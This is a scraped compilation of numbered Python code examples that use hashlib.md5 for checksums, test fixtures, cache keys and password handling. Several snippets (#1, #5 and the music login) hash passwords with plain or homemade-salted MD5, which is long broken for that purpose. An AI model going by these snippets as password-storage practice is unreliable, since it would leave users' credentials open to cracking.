Пример #1
0
def hashPassword(key):
	#Step 1 conversion of input to md5
	m = hashlib.md5()
	m.update(key)
	s1=m.hexdigest()
	print str(s1)
	#print 'Step 1 md5 ',s1
	#Step 2 Conversion of s1 to salt
	#By adding salt from 2 places from right as well left
	salt=r'tilak@Google05-05-1995#IndiaSal$100000$'
	l=len(s1)
	mid=s1[2:-2]
	s2=str(s1[0]+s1[1]+salt+mid+salt+s1[-2]+s1[-1])
	#print 's2  ',s2
	#Step 3
	#Converting salt version to md5 again
	m=hashlib.md5()
	m.update(s2)
	s3=m.hexdigest()
	#print 's3  ',s3
	#Step 4 
	#Replacement algorithm
	#replacing 9 by 1
	temp=s3.replace('9','1')
	#replacing 0 by 5
	temp=temp.replace('0','5')
	#replacing a by t
	temp=temp.replace('a','t')
Пример #2
0
    def _generate_suppress_file(self, suppress_file):
        """
        create a dummy supppress file just to check if the old and the new
        suppress format can be processed
        """
        import calendar
        import time
        import hashlib
        import random

        hash_version = '1'
        suppress_stuff = []
        for i in range(10):
            # epoch time
            t = calendar.timegm(time.gmtime())
            # random number
            r = random.randint(1, 9999999)
            n = str(t) + str(r)
            suppress_stuff.append(hashlib.md5(n).hexdigest() + '#' + hash_version)

        s_file = open(suppress_file, 'w')
        for k in suppress_stuff:
            s_file.write(k + '||' + 'idziei éléáálk ~!@#$#%^&*() \n')
            s_file.write(k + '||' + 'test_~!@#$%^&*.cpp' + '||' 'idziei éléáálk ~!@#$%^&*(\n')
            s_file.write(hashlib.md5(n).hexdigest() + '||' + 'test_~!@#$%^&*.cpp' + '||' 'idziei éléáálk ~!@#$%^&*(\n')

        s_file.close()
Пример #3
0
    def setup_bad_zero_byte(self, with_ts=False):
        self.auditor = auditor.ObjectAuditor(self.conf)
        self.auditor.log_time = 0
        ts_file_path = ''
        if with_ts:
            name_hash = hash_path('a', 'c', 'o')
            dir_path = os.path.join(
                self.devices, 'sda',
                storage_directory(get_data_dir(0), '0', name_hash))
            ts_file_path = os.path.join(dir_path, '99999.ts')
            if not os.path.exists(dir_path):
                mkdirs(dir_path)
            fp = open(ts_file_path, 'w')
            write_metadata(fp, {'X-Timestamp': '99999', 'name': '/a/c/o'})
            fp.close()

        etag = md5()
        with self.disk_file.create() as writer:
            etag = etag.hexdigest()
            metadata = {
                'ETag': etag,
                'X-Timestamp': str(normalize_timestamp(time.time())),
                'Content-Length': 10,
            }
            writer.put(metadata)
            etag = md5()
            etag = etag.hexdigest()
            metadata['ETag'] = etag
            write_metadata(writer._fd, metadata)
        return ts_file_path
Пример #4
0
def test_hexdump(vm, params):
    """
    Test hexdump command
    """
    add_ref = params.get("gf_add_ref", "disk")
    readonly = "yes" == params.get("gf_add_readonly")

    gf = utils_test.libguestfs.GuestfishTools(params)
    if add_ref == "disk":
        image_path = params.get("image_path")
        gf.add_drive_opts(image_path, readonly=readonly)
    elif add_ref == "domain":
        vm_name = params.get("main_vm")
        gf.add_domain(vm_name, readonly=readonly)
    gf.run()
    mount_point = params.get("mount_point")
    gf.mount(mount_point, "/")

    gf_result = gf.hexdump("/file_ops/file_ascii").stdout.strip()
    m = hashlib.md5()
    m.update(gf_result)
    logging.debug(m.hexdigest())
    if m.hexdigest() != "3ca9739a70e246745ee6bb55e11f755b":
        gf.close_session()
        raise error.TestFail("hexdump failed.")
    gf_result = gf.hexdump("/file_ops/file_tgz").stdout.strip()
    m = hashlib.md5()
    m.update(gf_result)
    logging.debug(m.hexdigest())
    if m.hexdigest() != "ee00d7203bea3081453c4f41e29f92b4":
        gf.close_session()
        raise error.TestFail("hexdump failed.")

    gf.close_session()
Пример #5
0
def encrypt(userID, password):
  first_md5 = hashlib.md5()
  first_md5.update(str(password))
  salt = first_md5.hexdigest()
  second_md5 = hashlib.md5()
  second_md5.update(str(userID) + salt)
  return second_md5.hexdigest()
Пример #6
0
    def test_findall(self):
        sheet = self.sheet

        list_len = 10
        range_label = 'A1:A%s' % list_len
        cell_list = sheet.range(range_label)
        value = hashlib.md5(str(time.time())).hexdigest()

        for c in cell_list:
            c.value = value
        sheet.update_cells(cell_list)

        result_list = sheet.findall(value)

        self.assertEqual(list_len, len(result_list))

        for c in result_list:
            self.assertEqual(c.value, value)

        cell_list = sheet.range(range_label)

        value = hashlib.md5(str(time.time())).hexdigest()
        for c in cell_list:
            char = chr(random.randrange(ord('a'), ord('z')))
            c.value = "%s%s_%s%s" % (c.value, char, char.upper(), value)

        sheet.update_cells(cell_list)

        o_O_re = re.compile('[a-z]_[A-Z]%s' % value)

        result_list = sheet.findall(o_O_re)

        self.assertEqual(list_len, len(result_list))
Пример #7
0
    def test_object_run_fast_track_non_zero(self):
        self.auditor = auditor.ObjectAuditor(self.conf)
        self.auditor.log_time = 0
        data = '0' * 1024
        etag = md5()
        with self.disk_file.create() as writer:
            writer.write(data)
            etag.update(data)
            etag = etag.hexdigest()
            metadata = {
                'ETag': etag,
                'X-Timestamp': str(normalize_timestamp(time.time())),
                'Content-Length': str(os.fstat(writer._fd).st_size),
            }
            writer.put(metadata)
            etag = md5()
            etag.update('1' + '0' * 1023)
            etag = etag.hexdigest()
            metadata['ETag'] = etag
            write_metadata(writer._fd, metadata)

        quarantine_path = os.path.join(self.devices,
                                       'sda', 'quarantined', 'objects')
        kwargs = {'mode': 'once'}
        kwargs['zero_byte_fps'] = 50
        self.auditor.run_audit(**kwargs)
        self.assertFalse(os.path.isdir(quarantine_path))
        del(kwargs['zero_byte_fps'])
        self.auditor.run_audit(**kwargs)
        self.assertTrue(os.path.isdir(quarantine_path))
Пример #8
0
	def delete(self, url):
		bucket = self.get_bucket()
		info, ret = bucket.delete(self.bucket_name, hashlib.md5(url).hexdigest())
		if ret.status_code == 200:
			logging.info("delete: %s" % hashlib.md5(url).hexdigest())
		else:
			logging.error("error delete: %s" % hashlib.md5(url).hexdigest())
Пример #9
0
	def fetch(self, url):
		bucket = self.get_bucket()
		info, ret = bucket.fetch(url, self.bucket_name, hashlib.md5(url).hexdigest())
		if ret.status_code == 200:
			return info
		else:
			logging.error("error fetch: %s" %  hashlib.md5(url).hexdigest())
Пример #10
0
    def _create_manifest(self):
        # Create a manifest file for SLO uploading
        object_name = data_utils.rand_name(name='TestObject')
        object_name_base_1 = object_name + '_01'
        object_name_base_2 = object_name + '_02'
        data_size = MIN_SEGMENT_SIZE
        self.content = data_utils.arbitrary_string(data_size)
        self._create_object(self.container_name,
                            object_name_base_1,
                            self.content)
        self._create_object(self.container_name,
                            object_name_base_2,
                            self.content)

        path_object_1 = '/%s/%s' % (self.container_name,
                                    object_name_base_1)
        path_object_2 = '/%s/%s' % (self.container_name,
                                    object_name_base_2)
        data_manifest = [{'path': path_object_1,
                          'etag': hashlib.md5(self.content).hexdigest(),
                          'size_bytes': data_size},
                         {'path': path_object_2,
                          'etag': hashlib.md5(self.content).hexdigest(),
                          'size_bytes': data_size}]

        return json.dumps(data_manifest)
Пример #11
0
def test(input=""):
    """test(input): displays results of input hashed with our md5
    function and the standard Python hashlib implementation
    """
    print `md5(input).hexdigest()`
    import hashlib
    print `hashlib.md5(input).hexdigest()`
Пример #12
0
def DigestCalcResponse(HA1, pszNonce, pszNonceCount, pszCNonce, pszQop, pszMethod, pszDigestUri, pszHEntity):
    delim = ':'.encode()
    m = md5()
    m.update(pszMethod.encode())
    m.update(delim)
    m.update(pszDigestUri.encode())
    if pszQop == "auth-int":
        m.update(delim)
        m.update(pszHEntity.encode())
    HA2 = m.hexdigest()
    m = md5()
    m.update(HA1)
    m.update(delim)
    m.update(pszNonce.encode())
    m.update(delim)
    if pszNonceCount and pszCNonce and pszQop:
        m.update(pszNonceCount.encode())
        m.update(delim)
        m.update(pszCNonce.encode())
        m.update(delim)
        m.update(pszQop.encode())
        m.update(delim)
    m.update(HA2.encode())
    response = m.hexdigest()
    return response
Пример #13
0
    def start(self, vm_path, username="", password="", shot_path=""):
        # creating a file .pid
        self.lock_file = '/tmp/lock.pid'
        if not os.path.exists(self.lock_file):
            lock = open(self.lock_file, 'w')
            lock.close()
        
        first = "%s/file1.png" % shot_path  
        self.proc = subprocess.Popen("%s -gu %s -gp %s captureScreen %s %s" % (self.vmrun, username, password, vm_path, first))
        first_hash = hashlib.md5(open(first, 'r').read()).digest()
        
        while True:
            
            if not os.path.exists(self.lock_file):
                print "stopping time"
                break
            
            # Take screenshot
            # TODO: 
            # username, password of guest account

            cur = "%s/file12.png" % shot_path  
            self.proc = subprocess.Popen("%s -gu %s -gp %s captureScreen %s %s" % (self.vmrun, username, password, vm_path, cur))
            # 2. md5 of file
            cur_hash = hashlib.md5(open(cur, 'r').read()).digest()

            # 3. if md5 current == previous delete file
            if cur_hash == first_hash:
                print "removing %s" % cur
                os.remove(cur)
            # 4. sleeping time
            sleep(1)
Пример #14
0
def hashmd5(*args):
    """
    .. function:: hashmd5(args)

    Returns an MD5 hash of args. Numbers are converted to text before hashing is
    performed.

    Examples:

    >>> sql("select hashmd5(65)")
    hashmd5(65)
    --------------------------------
    fc490ca45c00b1249bbe3554a4fdf6fb
    >>> sql("select hashmd5(6,5)")
    hashmd5(6,5)
    --------------------------------
    f0d95c20cde50e3ca03cab53f986b6c3
    >>> sql("select hashmd5(5)")
    hashmd5(5)
    --------------------------------
    e4da3b7fbbce2345d7772b0674a318d5
    >>> sql("select hashmd5('5')")
    hashmd5('5')
    --------------------------------
    7000aaf68ca7a93da0af3d03850571c2
    """

    if len(args) == 1:
        return hashlib.md5(repr(args[0])).hexdigest()
    else:
        return hashlib.md5(chr(30).join([repr(x) for x in args])).hexdigest()
Пример #15
0
def hashmd5mod(*args):
    """
    .. function:: hashmd5mod(args, divisor) -> int

    Returns the *modulo* with divisor number of the MD5 hash of args.
    Numbers are converted to text before hashing is performed.

    Examples:

    >>> sql("select hashmd5mod(65, 3)")
    hashmd5mod(65, 3)
    -----------------
    0

    >>> sql("select hashmd5mod(6,5, 4)")
    hashmd5mod(6,5, 4)
    ------------------
    2

    >>> sql("select hashmd5mod(5, 5)")
    hashmd5mod(5, 5)
    ----------------
    3
    
    >>> sql("select hashmd5mod('5', 5)")
    hashmd5mod('5', 5)
    ------------------
    4
    """

    if len(args) == 2:
        return int(hashlib.md5(repr(args[0])).hexdigest(), 16) % args[-1]
    else:
        return int(hashlib.md5(chr(30).join([repr(x) for x in args])).hexdigest(), 16) % args[-1]
Пример #16
0
 def test_palette(self):
     PAL = self.palette.savePAL()
     self.assertEqual(len(self.file), len(PAL))
     self.assertEqual(md5(self.file).hexdigest(), md5(PAL).hexdigest())
     newPalette = PalFile(PAL).getPalette()
     for i in xrange(len(self.palette)):
         self.assertEqual(self.palette[i], newPalette[i])
Пример #17
0
    def test_repeatability(self):
        import hashlib
        # We use a md5 hash of generated sequences of 1000 samples
        # in the range [0, 6) for all but np.bool, where the range
        # is [0, 2). Hashes are for little endian numbers.
        tgt = {'bool': '7dd3170d7aa461d201a65f8bcf3944b0',
               'int16': '1b7741b80964bb190c50d541dca1cac1',
               'int32': '4dc9fcc2b395577ebb51793e58ed1a05',
               'int64': '17db902806f448331b5a758d7d2ee672',
               'int8': '27dd30c4e08a797063dffac2490b0be6',
               'uint16': '1b7741b80964bb190c50d541dca1cac1',
               'uint32': '4dc9fcc2b395577ebb51793e58ed1a05',
               'uint64': '17db902806f448331b5a758d7d2ee672',
               'uint8': '27dd30c4e08a797063dffac2490b0be6'}

        for dt in self.itype[1:]:
            np.random.seed(1234)

            # view as little endian for hash
            if sys.byteorder == 'little':
                val = self.rfunc(0, 6, size=1000, dtype=dt)
            else:
                val = self.rfunc(0, 6, size=1000, dtype=dt).byteswap()

            res = hashlib.md5(val.view(np.int8)).hexdigest()
            assert_(tgt[np.dtype(dt).name] == res)

        # bools do not depend on endianess
        np.random.seed(1234)
        val = self.rfunc(0, 2, size=1000, dtype=np.bool).view(np.int8)
        res = hashlib.md5(val).hexdigest()
        assert_(tgt[np.dtype(np.bool).name] == res)
Пример #18
0
    def _run(self, edit, selections, r, data, view=None):
        global ignore_modified_timeout

        if not hasattr(self, 'view'):
            return selections

        start = max(int(r[0]), 0)
        stop = min(int(r[1]), self.view.size())
        region = sublime.Region(start, stop)

        if stop - start > 10000:
            self.view.replace(edit, region, data)
            G.VIEW_TO_HASH[self.view.buffer_id()] = hashlib.md5(sutils.get_text(self.view).encode('utf-8')).hexdigest()
            return transform_selections(selections, stop, 0)

        existing = self.view.substr(region)
        i = 0
        data_len = len(data)
        existing_len = len(existing)
        length = min(data_len, existing_len)
        while (i < length):
            if existing[i] != data[i]:
                break
            i += 1
        j = 0
        while j < (length - i):
            if existing[existing_len - j - 1] != data[data_len - j - 1]:
                break
            j += 1
        region = sublime.Region(start + i, stop - j)
        replace_str = data[i:data_len - j]
        self.view.replace(edit, region, replace_str)
        G.VIEW_TO_HASH[self.view.buffer_id()] = hashlib.md5(sutils.get_text(self.view).encode('utf-8')).hexdigest()
        new_offset = len(replace_str) - ((stop - j) - (start + i))
        return transform_selections(selections, start + i, new_offset)
Пример #19
0
    def test_write_truncate(self):
        knowngood = {}
        filelist = list(self.pak2.listfiles())
        for f in filelist:
            self.pak2.open(f)
            data = self.pak2.read()
            knowngood[f] = [len(data), md5(data).hexdigest()]
        size = getsize(self.filename2)

        buf = "123456789"
        bufmd5 = md5(buf).hexdigest()
        for i in xrange(0, len(filelist), 2):
            self.pak2.open(filelist[i], "r")
            size -= len(self.pak2.read())
            self.pak2.close()
            self.pak2.open(filelist[i], "w")
            self.pak2.write(buf)
            self.pak2.close()
            size += len(buf)
            knowngood[filelist[i]][0] = len(buf)
            knowngood[filelist[i]][1] = bufmd5

        for f in filelist:
            self.assertEqual(filelist, list(self.pak2.listfiles()))
            self.pak2.open(f)
            data = self.pak2.read()
            self.assertEqual(len(data), knowngood[f][0])
            self.assertEqual(md5(data).hexdigest(), knowngood[f][1])

        del self.pak2
        self.assertEqual(getsize(self.filename2), size)
Пример #20
0
    def check_vaga(self):
        """ checando se tem vaga """
        filename = os.path.join(self.folder, self.conf['backup'])

        while True:
            try:
                if not os.path.exists(filename):
                    data = self._get()
                    parse = self._parse(data)
                    self.lasthash = hashlib.md5(str(parse)).hexdigest()
                    self.salvar_dados(self._linhas(parse))
                else:
                    if not self.lasthash:
                        dadosantigos = self.carregando_dados()
                        self.lasthash = hashlib.md5(
                            dadosantigos.encode('utf-8')).hexdigest()
                    data = self._get()
                    parse = self._linhas(self._parse(data))
                    lasthash = hashlib.md5(parse.encode('utf-8')).hexdigest()
                    if lasthash != self.lasthash:
                        print "Existe algo novo"
                        self.enviar_notificacao()
                        self.salvar_dados(parse)
                        self.lasthash = lasthash
            except Exception as e:
                print "Error: %s" % e
                pass

            time.sleep(self.conf['periodo'])
Пример #21
0
    def calculate_md5_of_dir(self, verbose=0):
        """
        Calculate the md5 of the entire directory,
        with the md5 in client_snapshot and the md5 of full filepath string.
        When the filepath isn't in client_snapshot the md5 is calculated on fly
        :return is the md5 hash of the directory
        """
        directory = self.cfg['sharing_path']
        if verbose:
            start = time.time()
        md5Hash = hashlib.md5()
        if not os.path.exists(directory):
            self.stop(1, 'Error during calculate md5! Impossible to find "{}" in user folder'.format(directory))

        for root, dirs, files in os.walk(directory, followlinks=False):
            for names in files:
                filepath = os.path.join(root, names)
                rel_path = self.relativize_path(filepath)
                if rel_path in self.client_snapshot:
                    md5Hash.update(self.client_snapshot[rel_path][1])
                    md5Hash.update(hashlib.md5(filepath).hexdigest())
                else:
                    hashed_file = self.hash_file(filepath)
                    if hashed_file:
                        md5Hash.update(hashed_file)
                        md5Hash.update(hashlib.md5(filepath).hexdigest())
                    else:
                        print "can't hash file: ", filepath

        if verbose:
            stop = time.time()
            print stop - start
        return md5Hash.hexdigest()
Пример #22
0
    def test_unknown_emulator(self):
        """Objective: Emulator testing for non-malicious requests.
        Input: http://localhost:8080/
        Expected Result: One of the generated attack surfaces.
        Notes:"""

        tmp_file = os.path.join(self.data_dir, 'dork_pages', format(str(uuid.uuid4())))

        with open(tmp_file, 'w+') as f:
            f.write("tmpfile")
        print "Starting 'unknown' request emulation module"
        event = attack.AttackEvent()
        event.http_request = HTTPHandler('', None)
        event.matched_pattern = "unknown"
        event.http_request.path = "/"
        event.source_ip = "127.0.0.1"
        event.source_port = "8080"
        request_handler = RequestHandler(self.data_dir)
        emulator = request_handler.get_handler(event.matched_pattern)
        print "Sending request:", "http://localhost:8080/"
        emulator.handle(event)
        remote_hash = hashlib.md5(event.http_request.get_response_body()).hexdigest()
        local_hash = hashlib.md5(emulator.template).hexdigest()
        print "Hash of the local 'response' file:", local_hash
        self.assertEqual(remote_hash, local_hash)
        print "Return value:", remote_hash
        print "matched a generated attack surface item."
Пример #23
0
def save(request):
    form = forms.SaveForm(request.POST)
    if not form.is_valid():
        return http.HttpResponseBadRequest(str(form.errors))
    url = form.cleaned_data['url']
    upload_time = form.cleaned_data['upload_time']
    cache_key = 'length_%s' % hashlib.md5(url).hexdigest()
    size = cache.get(cache_key)
    if not size:
        r = requests.head(url)
        size = int(r.headers['content-length'])
        if not size:
            return http.HttpResponseBadRequest('URL could not be downloaded')
    cache_key = 'file_name_%s' % hashlib.md5(url).hexdigest()
    file_name = cache.get(cache_key)
    if not file_name:
        file_name = os.path.basename(url)

    cache_key = 'mime_type_%s' % hashlib.md5(url).hexdigest()
    mime_type = cache.get(cache_key)

    new_upload = Upload.objects.create(
        user=request.user,
        url=url,
        size=size,
        file_name=file_name,
        mime_type=mime_type,
        upload_time=upload_time,
    )
    messages.info(
        request,
        'Upload saved.'
    )
    context = {'id': new_upload.pk, 'url': new_upload.url}
    if request.session.get('active_event'):
        event_id = request.session['active_event']
        event = Event.objects.get(pk=event_id)
        event.upload = new_upload
        event.save()
        new_upload.event = event
        new_upload.save()
        next_url = reverse('manage:event_archive', args=(event_id,))
        next_url += '#vidly-shortcutter'
        context['event'] = {
            'url': next_url,
            'title': event.title,
        }
    elif request.session.get('active_suggested_event'):
        event_id = request.session['active_suggested_event']
        event = SuggestedEvent.objects.get(pk=event_id)
        event.upload = new_upload
        event.save()
        new_upload.suggested_event = event
        new_upload.save()
        next_url = reverse('suggest:description', args=(event_id,))
        context['suggested_event'] = {
            'url': next_url,
            'title': event.title
        }
    return context
Пример #24
0
    def hash_image_string(self, fp):
        """Returns hash based on image data

        Args:
            fp (str): path to image file

        Returns:
            Hash of image data as string
        """
        # FIXME: Output directory is hardcoded
        try:
            return hashlib.md5(Image.open(fp).tobytes()).hexdigest()
        except IOError:
            # Encountered a file format that PIL can't handle. Convert
            # file to something usable, hash, then delete the derivative.
            print 'Hashing jpeg derivative...'
            fn = os.path.basename(fp)
            jpeg = os.path.splitext(fn)[0] + '.jpg'
            cmd = 'iconvert "{}" "{}"'.format(fp, jpeg)  # FIXME
            return_code = subprocess.call(cmd, cwd=r'D:\embedded')
            if return_code:
                self.logfile.write('Error: {}: Bad return code ({})\n'.format(
                    fp, return_code))
            dst = os.path.join(r'D:\embedded', jpeg)
            h = hashlib.md5(Image.open(dst).tobytes()).hexdigest()
            os.remove(dst)
            return h
Пример #25
0
 def main_loop(self):
     while True:
         try:
             time.sleep(1)
             this_dir = os.listdir(os.getcwd())
             that_dir = eval(urllib.urlopen(self.url + "/list/" + self.username + "/" + self.password).read())
             if str(this_dir) != str(that_dir):
                 for this in this_dir:
                     if this not in self.files and this != sys.argv[0]:
                         with open(this, "rb") as md5file:
                             print "added", this
                             self.files[this] = hashlib.md5(md5file.read()).hexdigest()
                     if this not in that_dir and this != sys.argv[0]:
                         thread.start_new_thread(self.upload, (this,))
                 for that in that_dir:
                     if that not in this_dir:
                         thread.start_new_thread(self.download, (that,))
                 for file in self.files:
                     try:
                         with open(file, "rb") as check_file:
                             check = hashlib.md5(check_file.read()).hexdigest()
                             if check != self.files[file]:
                                 print file, "changed"
                                 urllib.urlopen(
                                     self.url + "/delete/" + self.username + "/" + self.password + "/" + file
                                 )
                                 self.files[file] = check
                                 thread.start_new_thread(self.upload, (file,))
                     except IOError:
                         pass
         except IOError:
             print "It seems as though your server is down, please check it."
             time.sleep(60)
Пример #26
0
def avatar_file_path(instance=None, filename=None, size=None, ext=None):
    tmppath = [settings.AVATAR_STORAGE_DIR]
    userdirname = get_username(instance.user)
    if settings.AVATAR_USERID_AS_USERDIRNAME:
        userdirname = str(instance.user_id)
    if settings.AVATAR_HASH_USERDIRNAMES:
        tmp = hashlib.md5(userdirname).hexdigest()
        tmppath.extend([tmp[0], tmp[1], userdirname])
    else:
        tmppath.append(userdirname)
    if not filename:
        # Filename already stored in database
        filename = instance.avatar.name
        if ext and settings.AVATAR_HASH_FILENAMES:
            # An extension was provided, probably because the thumbnail
            # is in a different format than the file. Use it. Because it's
            # only enabled if AVATAR_HASH_FILENAMES is true, we can trust
            # it won't conflict with another filename
            (root, oldext) = os.path.splitext(filename)
            filename = root + "." + ext
    else:
        # File doesn't exist yet
        if settings.AVATAR_HASH_FILENAMES:
            (root, ext) = os.path.splitext(filename)
            filename = hashlib.md5(force_bytes(filename)).hexdigest()
            filename = filename + ext
    if size:
        tmppath.extend(['resized', str(size)])
    tmppath.append(os.path.basename(filename))
    return os.path.join(*tmppath)
 def login_and_get_cookie(self, username, password):
     pattern = re.compile(r'^0\d{2,3}\d{7,8}$|^1[34578]\d{9}$')
     if (pattern.match(username)):
         print 'cellphone login'
         action = 'https://music.163.com/api/login/cellphone'
         data = {
             'phone': username,
             'password': hashlib.md5(str(password)).hexdigest(),
             'rememberLogin': '******'
         }
     else:
         action = 'http://music.163.com/api/login/'
         data = {
             'username': username,
             'password': hashlib.md5(str(password)).hexdigest(),
             'rememberLogin': '******'
         }
     s = requests.Session()
     try:
         connection = s.post(
             action,
             data=data,
             headers=self.header,
             timeout=default_timeout
         )
         connection.encoding = "UTF-8"
         connection = json.loads(connection.text)
         self.uid = connection['account']['id']
         self.save_cookie(s.cookies)
         self.cookies = s.cookies
         return s.cookies
     except:
         print 'login failed'
         return None
Пример #28
0
 def test_compression_decompression_noeos(self):
     # call compression and decompression on random data of various sizes
     for i in range(18):
         size = 1 << i
         original = generate_random(size)
         result = pylzma.decompress(pylzma.compress(original, eos=0), maxlength=size)
         self.assertEqual(md5(original).hexdigest(), md5(result).hexdigest())
Пример #29
0
 def getEncryption(self):
     puk = rsa.PublicKey(int(
         'F20CE00BAE5361F8FA3AE9CEFA495362'
         'FF7DA1BA628F64A347F0A8C012BF0B25'
         '4A30CD92ABFFE7A6EE0DC424CB6166F8'
         '819EFA5BCCB20EDFB4AD02E412CCF579'
         'B1CA711D55B8B0B3AEB60153D5E0693A'
         '2A86F3167D7847A0CB8B00004716A909'
         '5D9BADC977CBB804DBDCBA6029A97108'
         '69A453F27DFDDF83C016D928B3CBF4C7',
         16
     ), 3)
     e = int(self.qq).to_bytes(8, 'big')
     o = hashlib.md5(self.pwd.encode())
     r = bytes.fromhex(o.hexdigest())
     p = hashlib.md5(r + e).hexdigest()
     a = binascii.b2a_hex(rsa.encrypt(r, puk)).decode()
     s = hex(len(a) // 2)[2:]
     l = binascii.hexlify(self.vcode.upper().encode()).decode()
     c = hex(len(l) // 2)[2:]
     c = '0' * (4 - len(c)) + c
     s = '0' * (4 - len(s)) + s
     salt = s + a + binascii.hexlify(e).decode() + c + l
     return base64.b64encode(
         tea.encrypt(bytes.fromhex(salt), bytes.fromhex(p))
     ).decode().replace('/', '-').replace('+', '*').replace('=', '_')
Пример #30
0
def write_default_config():
    c = configparser.ConfigParser()
    if not c.has_section('bgmi'):
        c.add_section('bgmi')

    for k in __writeable__:
        v = globals().get(k, '0')
        if k == 'ADMIN_TOKEN' and v is None:
            if sys.version_info > (3, 0):
                v = hashlib.md5(str(random.random()).encode('utf-8')).hexdigest()
            else:
                v = hashlib.md5(str(random.random())).hexdigest()

        c.set('bgmi', k, v)

    if DOWNLOAD_DELEGATE not in DOWNLOAD_DELEGATE_MAP.keys():
        raise Exception(DOWNLOAD_DELEGATE)

    if not c.has_section(DOWNLOAD_DELEGATE):
        c.add_section(DOWNLOAD_DELEGATE)

    for k in DOWNLOAD_DELEGATE_MAP.get(DOWNLOAD_DELEGATE, []):
        v = globals().get(k, None)
        c.set(DOWNLOAD_DELEGATE, k, v)

    try:
        with open(CONFIG_FILE_PATH, 'w') as f:
            c.write(f)
    except IOError:
        print('[-] Error writing to config file and ignored')
Пример #31
0
def md5(s):
    return hashlib.md5(s.encode('utf-8')).hexdigest()[:4]
Пример #32
0
def get_hash(paths):
    # Returns a single hash value of a list of paths (files or dirs)
    size = sum(os.path.getsize(p) for p in paths if os.path.exists(p))  # sizes
    h = hashlib.md5(str(size).encode())  # hash sizes
    h.update(''.join(paths).encode())  # hash paths
    return h.hexdigest()  # return hash
    def handle_multipart_put(self, req, start_response):
        """
        Will handle the PUT of a SLO manifest.
        Heads every object in manifest to check if is valid and if so will
        save a manifest generated from the user input. Uses WSGIContext to
        call self and start_response and returns a WSGI iterator.

        :params req: a swob.Request with an obj in path
        :raises: HttpException on errors
        """
        try:
            vrs, account, container, obj = req.split_path(1, 4, True)
        except ValueError:
            return self.app(req.environ, start_response)
        if req.content_length > self.max_manifest_size:
            raise HTTPRequestEntityTooLarge("Manifest File > %d bytes" %
                                            self.max_manifest_size)
        if req.headers.get('X-Copy-From'):
            raise HTTPMethodNotAllowed(
                'Multipart Manifest PUTs cannot be COPY requests')
        if req.content_length is None and \
                req.headers.get('transfer-encoding', '').lower() != 'chunked':
            raise HTTPLengthRequired(request=req)
        parsed_data = parse_input(req.body_file.read(self.max_manifest_size))
        problem_segments = []

        if len(parsed_data) > self.max_manifest_segments:
            raise HTTPRequestEntityTooLarge(
                'Number of segments must be <= %d' %
                self.max_manifest_segments)
        total_size = 0
        out_content_type = req.accept.best_match(ACCEPTABLE_FORMATS)
        if not out_content_type:
            out_content_type = 'text/plain'
        data_for_storage = []
        slo_etag = md5()
        for index, seg_dict in enumerate(parsed_data):
            obj_name = seg_dict['path']
            if isinstance(obj_name, unicode):
                obj_name = obj_name.encode('utf-8')
            obj_path = '/'.join(['', vrs, account, obj_name.lstrip('/')])
            if req.path == quote(obj_path):
                raise HTTPConflict('Manifest object name "%s" '
                                   'cannot be included in the manifest' %
                                   obj_name)
            try:
                seg_size = int(seg_dict['size_bytes'])
            except (ValueError, TypeError):
                raise HTTPBadRequest('Invalid Manifest File')
            if seg_size < self.min_segment_size and \
                    index < len(parsed_data) - 1:
                raise HTTPBadRequest(
                    'Each segment, except the last, must be at least '
                    '%d bytes.' % self.min_segment_size)

            new_env = req.environ.copy()
            new_env['PATH_INFO'] = obj_path
            new_env['REQUEST_METHOD'] = 'HEAD'
            new_env['swift.source'] = 'SLO'
            del (new_env['wsgi.input'])
            del (new_env['QUERY_STRING'])
            new_env['CONTENT_LENGTH'] = 0
            new_env['HTTP_USER_AGENT'] = \
                '%s MultipartPUT' % req.environ.get('HTTP_USER_AGENT')
            head_seg_resp = \
                Request.blank(obj_path, new_env).get_response(self)
            if head_seg_resp.is_success:
                total_size += seg_size
                if seg_size != head_seg_resp.content_length:
                    problem_segments.append([quote(obj_name), 'Size Mismatch'])
                if seg_dict['etag'] == head_seg_resp.etag:
                    slo_etag.update(seg_dict['etag'])
                else:
                    problem_segments.append([quote(obj_name), 'Etag Mismatch'])
                if head_seg_resp.last_modified:
                    last_modified = head_seg_resp.last_modified
                else:
                    # shouldn't happen
                    last_modified = datetime.now()

                last_modified_formatted = \
                    last_modified.strftime('%Y-%m-%dT%H:%M:%S.%f')
                seg_data = {
                    'name': '/' + seg_dict['path'].lstrip('/'),
                    'bytes': seg_size,
                    'hash': seg_dict['etag'],
                    'content_type': head_seg_resp.content_type,
                    'last_modified': last_modified_formatted
                }
                if config_true_value(
                        head_seg_resp.headers.get('X-Static-Large-Object')):
                    seg_data['sub_slo'] = True
                data_for_storage.append(seg_data)

            else:
                problem_segments.append(
                    [quote(obj_name), head_seg_resp.status])
        if problem_segments:
            resp_body = get_response_body(out_content_type, {},
                                          problem_segments)
            raise HTTPBadRequest(resp_body, content_type=out_content_type)
        env = req.environ

        if not env.get('CONTENT_TYPE'):
            guessed_type, _junk = mimetypes.guess_type(req.path_info)
            env['CONTENT_TYPE'] = guessed_type or 'application/octet-stream'
        env['swift.content_type_overridden'] = True
        env['CONTENT_TYPE'] += ";swift_bytes=%d" % total_size
        env['HTTP_X_STATIC_LARGE_OBJECT'] = 'True'
        json_data = json.dumps(data_for_storage)
        env['CONTENT_LENGTH'] = str(len(json_data))
        env['wsgi.input'] = StringIO(json_data)

        slo_put_context = SloPutContext(self, slo_etag)
        return slo_put_context.handle_slo_put(req, start_response)
def main(htmlstring, driver):
    table_name = "maricopa_30_08_2020"

    header = {
                'accept': '*/*',
                'accept-encoding': 'gzip, deflate, br',
                'accept-language': 'en-US,en;q=0.9,ko;q=0.8',
